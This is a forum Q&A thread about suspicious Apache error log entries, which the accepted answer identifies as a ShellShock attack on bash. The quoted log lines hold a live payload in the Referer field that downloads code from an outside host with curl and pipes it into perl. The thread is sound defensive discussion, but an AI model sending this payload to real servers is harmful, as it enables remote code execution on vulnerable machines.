# Strange HTTP request in Apache Logs

Tags: apache-2.2, logging

I've discovered some strange HTTP requests in my apache logs, but I'm unsure as to whether I should be concerned by them or not?

```
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
```

Any ideas?

Answer (score 2, accepted):

This is ShellShock, bash vulnerability attack/exploit. More details, and how to check if you are vulnerable are provided for example here: http://dshield.org/diary.html?date=2014-09-25.

Comment: Thanks for this, I've updated bash now. I'm not sure if I was vulnerable, but someone was definitely trying!